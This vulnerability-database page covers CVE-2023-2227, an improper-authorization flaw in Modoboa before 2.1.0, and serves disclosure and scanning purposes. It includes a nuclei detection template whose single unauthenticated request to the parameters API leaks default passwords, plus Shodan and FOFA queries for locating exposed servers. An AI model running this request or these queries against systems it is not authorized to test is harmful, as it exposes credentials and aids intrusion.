Modoboa < 2.1.0 - Improper Authorization

29 Jun 2026 05:52:57 | Reported by: ProjectDiscovery | Type: nuclei | Source: github.com

Modoboa < 2.1.0 - Improper Authorization in GitHub repositor

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Huntr | Improper Authorization | 25 Feb 2023 03:56 | huntr |
| Circl | CVE-2023-2227 | 21 Apr 2023 16:31 | circl |
| CNNVD | modoboa authorization issue vulnerability | 21 Apr 2023 00:00 | cnnvd |
| CNVD | Modoboa Information Disclosure Vulnerability | 24 Apr 2023 00:00 | cnvd |
| CVE | CVE-2023-2227 | 21 Apr 2023 00:00 | cve |
| Cvelist | CVE-2023-2227 Improper Authorization in modoboa/modoboa | 21 Apr 2023 00:00 | cvelist |
| Github Security Blog | Improper Authorization in modoboa | 21 Apr 2023 15:30 | github |
| NVD | CVE-2023-2227 | 21 Apr 2023 13:15 | nvd |
| OSV | CVE-2023-2227 Improper Authorization in modoboa/modoboa | 21 Apr 2023 00:00 | osv |
| OSV | GHSA-67MG-GM8M-PH5R Improper Authorization in modoboa | 21 Apr 2023 15:30 | osv |

id: CVE-2023-2227

info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
  impact: |
    Unauthenticated attackers can access sensitive configuration parameters including default passwords and authentication settings through the API endpoint, potentially compromising the entire email management system.
  remediation: |
    Update Modoboa to version 2.1.0 or later that implements proper authorization checks for the parameters API endpoint.
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2227
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-2227
    cwe-id: CWE-285
    epss-score: 0.43756
    epss-percentile: 0.98583
    cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: modoboa
    product: modoboa
    shodan-query:
      - "http.favicon.hash:1949005079"
      - http.html:"modoboa"
    fofa-query:
      - "body=\"Modoboa\""
      - body="modoboa"
      - icon_hash=1949005079
  tags: cve,cve2023,modoboa,exposure,disclosure,vuln

http:
  - raw:
      - |
        GET /api/v2/parameters/core/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 7h3h4ckv157

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'label":'
          - 'default_password":'
          - 'authentication_type":"local'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d8c0ef2204675744ef13c778b7da02622fea2e91b44c933f0990e7334c347a2e02200a29355f4361ba1ba6b975642ea4d95b7cb03c1c800e8f03b90e9f6594cf38f6:922c64590222798bb761d5b6d8e72950

Scores (04 Feb 2026 07:00, current):
Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 9.1
CVSS 3: 9.1
EPSS: 0.43756